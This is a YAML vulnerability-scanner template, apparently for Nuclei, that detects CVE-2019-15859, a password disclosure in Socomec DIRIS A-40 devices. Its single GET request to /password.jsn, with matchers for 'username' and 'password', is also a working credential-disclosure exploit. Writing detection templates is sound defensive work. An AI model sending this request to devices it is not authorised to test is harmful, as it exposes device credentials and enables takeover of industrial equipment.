40 lines
1.0 KiB
YAML
40 lines
1.0 KiB
YAML
id: CVE-2019-15859
|
|
|
|
info:
|
|
name: Socomec DIRIS A-40 Devices Password Disclosure
|
|
author: geeknik
|
|
description: "Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI."
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2019/Oct/10
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15859
|
|
severity: critical
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2019-15859
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2019,disclosure,socomec,diris,iot
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/password.jsn"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "text/json"
|
|
part: header
|
|
- type: word
|
|
words:
|
|
- "username"
|
|
- "password"
|
|
part: body
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/03/29
|